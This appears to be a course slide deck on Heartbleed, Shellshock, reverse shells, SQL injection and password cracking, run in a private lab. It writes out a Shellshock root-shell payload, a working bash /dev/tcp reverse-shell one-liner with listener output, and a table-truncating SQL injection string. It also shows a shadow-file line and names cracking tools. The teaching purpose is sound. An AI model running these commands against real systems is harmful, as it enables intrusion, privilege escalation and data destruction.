# Contents [Heartbleed](#/heartbleed) [Shellshock](#/shellshock) [Reverse Shells](#/reverseshells) [Password Cracking](#/passwords)
# Heartbleed
## Heartbleed (2012) <!-- .slide: class="right-float-img-800" -->  - A problem in *one* implementation of the TLS protocol - Specifically the [OpenSSL library](https://www.openssl.org/) implementation - Source code on [github](https://github.com/openssl/openssl) - Affected about one sixth of all websites - Well known because: - A serious attack - A catch looking name and logo ## Heartbleed - [RFC 6520](https://tools.ietf.org/html/rfc6520) allows a client to send a *Heartbeat Request* message -- like a ping -- to the server - It consists of a string and its size (as a 16-bit int) - The server sends that message back - In OpenSSL, the library did not check the size of the message - So if you sent "bird" and 65,536, it would send 64Kb of data back - Which would be a 64Kb dump of the server's memory
xkcd on Heartbleed (
# 1354
)
xkcd on Heartbleed (
# 1354
)
xkcd on Heartbleed (
# 1354
)
## Seriousness > Some might argue that Heartbleed is the worst vulnerability found (at least in terms of its potential impact) since commercial traffic began to flow on the Internet. - Forbes cybersecurity columnist Joseph Steinberg <h2 class="r-fit-text">Heartbleed Response Contruction</h2>  <!-- .slide: class="smaller-pre wide-pre" --> ## Source code ```c /* Allocate memory for the response, size is 1 byte * message type, plus 2 bytes payload length, plus * payload, plus padding */ unsigned int payload; unsigned int padding = 16; /* Use minimum padding */ // Read from type field first hbtype = *p++; /* After this instruction, the pointer * p will point to the payload_length field */ // Read from the payload_length field from the request packet n2s(p, payload); /* Function n2s(p, payload) reads 16 bits * from pointer p and store the value * in the INT variable "payload". */ pl = p; // pl points to the beginning of the payload content if (hbtype == TLS1_HB_REQUEST) { unsigned char *buffer, *bp; int r; /* Allocate memory for the response, size is 1 byte * message type, plus 2 bytes payload length, plus * payload, plus padding */ buffer = OPENSSL_malloc(1 + 2 + payload + padding); bp = buffer; // Enter response type, length and copy payload *bp++ = TLS1_HB_RESPONSE; s2n(payload, bp); // copy payload memcpy(bp, pl, payload); /* pl is the pointer which * points to the beginning * of the payload content */ bp += payload; // Random padding RAND_pseudo_bytes(bp, padding); // this function will copy the 3+payload+padding bytes // from the buffer and put them into the heartbeat response // packet to send back to the request client side. OPENSSL_free(buffer); r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding); } ``` <h2 class="r-fit-text">Heartbleed Response Contruction</h2>  ## Mitigation - Quick source code fix: ```c /* silently discard per RFC 6520 sec. 4 */ if (1 + 2 + payload + 16 > s->s3->rrec.length) return 0; ``` - More extensive fixes were also implemented - Re-generation of server keys ## What was compromised? - Server private keys - Many certificates were revoked and re-issued - Passwords - Social insurance numbers (Canadian SSNs) - "Anti-malware researchers also exploited Heartbleed to their own advantage in order to access secret forums used by cybercriminals" (Wikipedia) ## Aftermath > Think about it, OpenSSL only has two [fulltime] people to write, maintain, test, and review 500,000 lines of business critical code. > - John Walsh, software engineer - The [Core Infrastructure Initiative](https://en.wikipedia.org/wiki/Core_Infrastructure_Initiative) was created by the Linux Foundation - Provides funds to allow those working on it to develop full-time, and also pay for security audits - Since superceded by the [Open Source Security Foundation](https://en.wikipedia.org/wiki/Open_Source_Security_Foundation)
# Shellshock
<!-- .slide: class="right-float-img-800" --> ## Background: bash functions  One can declare functions in the bash shell: ```bash $ foo() { echo "hello world"; } $ declare -f foo foo () { echo "hello world" } $ foo hello world $ unset -f foo $ declare -f foo $ ``` ## Pass function to child process ```bash $ foo() { echo "hello world"; } $ declare -f foo foo () { echo "hello world" } $ foo hello world $ export -f foo $ /bin/bash child$ declare -f foo foo () { echo "hello world" } child$ foo hello world child$ ``` ## Toward a vulnerability This works on the *metasploit* container ```bash $ foo='() { echo "hello world"; }' $ echo $foo () { echo "hello world"; } $ declare -f foo $ export foo $ /bin/bash child$ echo $foo child$ declare -f foo foo () { echo "hello world" } child$ foo hello world child$ ``` ## Non-shellshock version Run on, say, *outer1* ```bash $ foo='() { echo "hello world"; }' $ echo $foo () { echo "hello world"; } $ declare -f foo $ export foo $ /bin/bash child$ echo $foo () { echo "hello world"; } child$ declare -f foo child$ foo bash: foo: command not found child$ ``` ## Toward a vulnerability - A carefully crafted environment variable would be turned into a function in a child process - This functionality was intentional at the time, and has since been removed - This is part 1 of the vulnerability - If the child is a shell, the parent doesn't have to be - It just has to have environment variables set - There is a part 2 to the vulnerability... ## Shellshock exploit This works on the *metasploit* container ```bash $ foo='() { echo "hello world"; }; pwd;' $ echo $foo () { echo "hello world"; }; pwd; $ export foo $ /bin/bash /root child$ echo $foo child$ declare -f foo foo () { echo "hello world" } child$ ``` Notice the `/root` when the child process was run ## Shellshock exploit - A carefully crafted environment variable: ```bash foo='() { echo "hello world"; }; pwd;' ``` - Will turn into a function in a child process - *ALSO* it will execute the last command (`pwd`) when the child process starts: ```bash $ /bin/bash /root child$ ``` - This *arbitrary code execution* is the Shellshock vulnerability - Executing the code (here `pwd`) was due to a parsing error <!-- .slide: class="small-pre" --> <h2 class="r-fit-text">Shellshock exploit on <i>metasploit</i></h2> ```bash $ whoami user $ cat vul.c #include <unistd.h> #include <stdio.h> #include <stdlib.h> int main() { setuid(geteuid()); system("/bin/ls -l"); return 0; } $ gcc vul.c -o vul $ sudo chown root vul $ sudo chmod 4755 vul $ ./vul -rwsr-xr-x 1 root user 6567 2024-03-26 23:47 vul -rw-r--r-- 1 root root 138 2024-03-26 23:46 vul.c $ whoami user $ export foo='() { echo "hello world"; }; /bin/sh' $ ./vul sh-3.2# whoami root sh-3.2# ``` ## `chmod 4755` - This command will: - Allow the owner (root) to read, write, and execute it (the '7' value) - Allow the group to read and execute it (the first '5' value) - Allow everybody else to read and execute it (the second '5' value) - Also: - The initial '4' digit is the set-uid bit - Meaning it runs as if it were the owner (root) - Many programs have this setuid bit set, including, at the time, ping: ```bash root@metasploit:~# ls -l /bin/ping -rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping root@metasploit:~# ``` ## Vulnerability Level - Many processes, when running another command, invoke it via a shell - Python: `os.system()` - C/C++: `system()` - This is often /bin/bash (although not always) ## Vulnerable platforms - CGI-based web server - One can pass environment variables in the HTTP header - CGI executes a shell for each time it runs the server-side program - OpenSSH server - The `SSH_ORIGINAL_COMMAND` is parsed by the server as root, and then executed as the user - But with Shellshock, one can then execute any command as root - DHCP - Some DHCP clients pass commands to bash - With additional options to the DHCP request, Shellshock is activated - And so on... ## One ideal goal - Is to execute a *reverse shell* on the host - Which leads us to...
# Reverse Shells
## Reverse Shell - A normal remote shell, such as telnet or ssh, has the client connecting to the server - In a *reverse* shell, the roles are reversed - The server, usually through an exploit, initiates a connection to the client (attacker) - The attacker can then execute commands on the server - Here is a [list of some reverse shells](https://www.acunetix.com/blog/web-security-zone/what-is-reverse-shell/) - Here is a [list of even more reverse shells](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) ## File Descriptors - An integer that the OS maps to an open file - All programs start with three: - 0: stdin (standard input) - 1: stdout (standard output) - 2: stderr (standard error) - When you open a file, it creates a file descriptor starting at 3 - C makes these explicit; Python wraps them in a class <!-- .slide: class="small-pre" --> ## File Descriptors ([fd.c](code/fd.c.html)) ``` $ cat fd.c #include <stdio.h> #include <fcntl.h> #include <unistd.h> int main() { char *output = "hello world\n"; int fd = open("fd.out",O_CREAT|O_WRONLY|O_TRUNC); printf("file descriptor: %d\n",fd); write(fd, output, 12); close(fd); return 0; } $ clang -o fd fd.c $ ./fd file descriptor: 3 $ chmod 644 fd.out $ cat fd.out hello world $ ``` - This is a very low-level interface; C's `fopen()` is not as annoying to use ## Redirection Output ``` $ echo "hello world" > output.txt $ cat output.txt hello world $ ``` - This redirects the output of the command into `output.txt` - Equivalent command: ``` echo "hello world" 1> output.txt ``` - Note we are specifying *which* FD to use - Although we are still using the default (stderr) ## Redirection Input ``` $ a.out < input.txt $ ``` - This redirects the contents of `input.txt` as the input of the `a.out` program - Equivalent command: ``` $ a.out 0< input.txt ``` - Note we are specifying *which* FD to use - Although we are still using the default (stdin) ## `>` versus `>&` - The `>` operator redirects output to a new "thing" - File, process, etc. - The `>&` operator redirects output to an already opened "thing" - An already open connection or pipe, etc. - This is not file appending (that's `>>`) ## Combining FDs <!-- .slide: class="small-pre" --> - Putting `2>&1` will redirect stderr to stdout: ``` $ ls -F directory/ file $ grep test * grep: directory: Is a directory file:this is a test $ grep test * > output.txt grep: directory: Is a directory $ cat output.txt file:this is a test $ grep test * 2> output.txt file:this is a test $ cat output.txt grep: directory: Is a directory $ grep test * > output.txt 2>&1 $ cat output.txt grep: directory: Is a directory file:this is a test ``` <!-- .slide: class="small-pre" --> ## Linux & TCP Refresher - Running `nc -l 4760` will listen on port 4760, and print any output received - In Linux, we can write to `/dev/tcp/<IP>/<port>` to send data to that IP & port ``` root@outer1:~# echo "hello world" > /dev/tcp/192.168.100.102/4760 root@outer1:~# ``` ``` root@outer2:~# nc -l 4760 hello world root@outer2:~# ``` <!-- .slide: class="small-pre" --> ## Reverse Shell attempt 1 *outer1* is the victim machine: ``` root@outer1:/# bash -i > /dev/tcp/192.168.100.102/4760 root@outer1:/# hostname root@outer1:/# ls -l root@outer1:/# exit exit root@outer1:/# ``` *outer2* is the attacker machine: ``` root@outer2:~# nc -l 4760 outer1 lrwxrwxrwx 1 root root 7 Jan 25 09:04 bin -> usr/bin drwxr-xr-x 2 root root 4096 Apr 18 2022 boot ... root@outer2:~# ``` ## Reverse Shell attempt 1  - This only redirects stdin <!-- .slide: class="small-pre" --> ## Reverse Shell attempt 2 *outer1* is the victim machine (note the `0<&1`): ``` root@outer1:/# bash -i > /dev/tcp/192.168.100.102/4760 0<&1 root@outer1:/# ls -l root@outer1:/# ``` *outer2* is the attacker machine: ``` root@outer2:/# nc -l 4760 hostname outer1 ls -l total 116 lrwxrwxrwx 1 root root 7 Jan 25 09:04 bin -> usr/bin drwxr-xr-x 2 root root 4096 Apr 18 2022 boot ... ^C root@outer2:/# ``` ## Reverse Shell attempt 2  - This takes stdin from the attacker (*outer2*) and prints the output to the attacker - This also printed the command on the victim machine - But what about stderr? <!-- .slide: class="small-pre" --> ## Reverse Shell attempt 3 *outer1* is the victim machine (note the `2<&1`): ``` root@outer1:/# bash -i > /dev/tcp/192.168.100.102/4760 0<&1 2>&1 root@outer1:/# ``` *outer2* is the attacker machine: ``` root@outer2:/# nc -l 4760 root@outer1:/# hostname hostname outer1 root@outer1:/# ls -l ls -l total 116 -rwxr-xr-x 1 root root 9040 Mar 28 21:02 a.out lrwxrwxrwx 1 root root 7 Jan 25 09:04 bin -> usr/bin ... root@outer1:/# ^C root@outer2:/# ``` ## Reverse Shell attempt 3  The final version: ``` bash -i > /dev/tcp/192.168.100.102/4760 0<&1 2>&1 ``` It's that easy, and can be run as a non-root user
# Password Cracking
## Before proceeding... Go over the [fuzzing slide column](websecurity.html#/fuzzing) in the [Web Security slide set](websecurity.html#/) <!-- .slide: class="small-pre wide-pre" --> <h2 class="r-fit-text">Step 1: Obtain the password database</h2> - Shell access on the remote system (reverse shell, allowed access, etc.) - Not in /etc/passwd, but in /etc/shadow (often not readable): - These are hashed and salted ``` user:$y$j9T$wmEh7N6.PIYqdbr52Fqpj1$owbqqdSR3KqbONd59bnwWni/yvl3Yw4ahqFTiiwfQxC:19828:0:99999:7::: ``` - Script that "leaks" information - How the original Silk Road was supposedly attacked - Fuzz for password files on the server - SQL injection attack - Bypass password entirely (SSH MITM, remote shell, etc.) <h2 class="r-fit-text">Even Better Password "Cracking"</h2> <img src="https://imgs.xkcd.com/comics/how_hacking_works.png" title="If only somebody had warned them that the world would roll them like this." alt="How Hacking Works" srcset="https://imgs.xkcd.com/comics/how_hacking_works_2x.png 2x" style="image-orientation:none" class='stretch'> <p class='center'><a href='http://xkcd.com/2176/'>xkcd # 2176</a></p> - Obtain the passwords, either plaintext or encrypted/hashed, from a dark web source <h2 class="r-fit-text">Vulnerable script for SQL injections</h2> - Let's imagine that your web script asks for your userid - Then does a select command on that value - Pseudo-code: ``` var userid = getUseridFromWebForm() var query = "select * from course where userid='" + userid + "';" var result = databaseQuery (query) doSomethingWithTheResult (result) ``` - This has a SQL injection attack vulnerability - Next, we'll see an exploit ## Normal operation - If we enter 'asb2t' into the web form, we will get the following SQL command: <pre class="code"> select * from course where userid='<span class='hotpink'>asb2t</span>'; </pre> - Which works as desired ## SQL injection attack exploit - What if we enter the following as our userid: ``` '; truncate course; -- ``` - At that point, our SQL command is as follows: <pre class="code"> select * from course where userid='<span class='hotpink'>'; truncate course; -- </span>'; </pre> - Which does not work as desired ## SQL injection attack exploit - Our SQL injection attack query: <pre class="code"> select * from course where userid='<span class='hotpink'>'; truncate course; -- </span>'; </pre> - The DB will perform two database operations (a select then a delete), and then see a comment at the end of the statement - The DB function the script calls might return a value or it might not - At this point, we have deleted everything from the table
xkcd # 327
on SQL injection attacks
Exploits of a Mom
## SQL injection attack exploit - This is not stealthy - the DB probably won't work right if everything has been deleted - Another option is to enter your own credentials or data - Most likely it is to steal data <h2 class="r-fit-text">Case Study: Ashley Madison Attack</h2>  - [Ashley Madison data breach](https://en.wikipedia.org/wiki/Ashley_Madison_data_breach) in 2015 - This is the site that peddled extra-marital affairs - The hackers threatened to release the site's 60 Gb DB info unless the site was closed down - No ransom was requested! - They did reveal the information, which led to embarrassment and some suicides - Interestingly, almost all of the "female" members were bots... - Passwords were not salted, and no password restrictions were imposed ## Better SQL Injections - SQLMap at [sqlmap.org](https://sqlmap.org/) - It does it all for you - Just specify a few parameters, and away it goes ## Password cracking with a salt - High budget: have a multi-processor system that will compute all hashes of all passwords with a salt - The 3-letter agencies have this budget - Low budget: - Figure out the salt (next slide), and use brute force tools to determine the password ## Determine the salt - Some systems (Django) use the "security_key" (or similar) as the salt - In /etc/shadow on UNIX systems: ``` user:$y$j9T$wmEh7N6.PIYqdbr52Fqpj1$owbqqdSR3KqbONd59bnwWni/yvl3Yw4ahqFTiiwfQxC:19828:0:99999:7::: ``` - Take the second field, and split on the dollar sign - `y` the algorithm used (y is [yescrypt](https://www.openwall.com/yescrypt/)) - `j9T` is a parameter to the yescrypt algorithm - `wmEh7N6.PIYqdbr52Fqpj1` is the salt (aka nonce) - `owbqqdSR3KqbONd59bnwWni/yvl3Yw4ahqFTiiwfQxC` is the encoded (encrypted and/or hashed) password ## Step 2: Crack the password - Popular tools: - [Jack the Ripper](https://www.openwall.com/john/) - [Hashcat](https://hashcat.net/hashcat/) - [Hydra](https://www.kali.org/tools/hydra/) - The 3-letter agencies will have resources to do this much faster than regular individuals
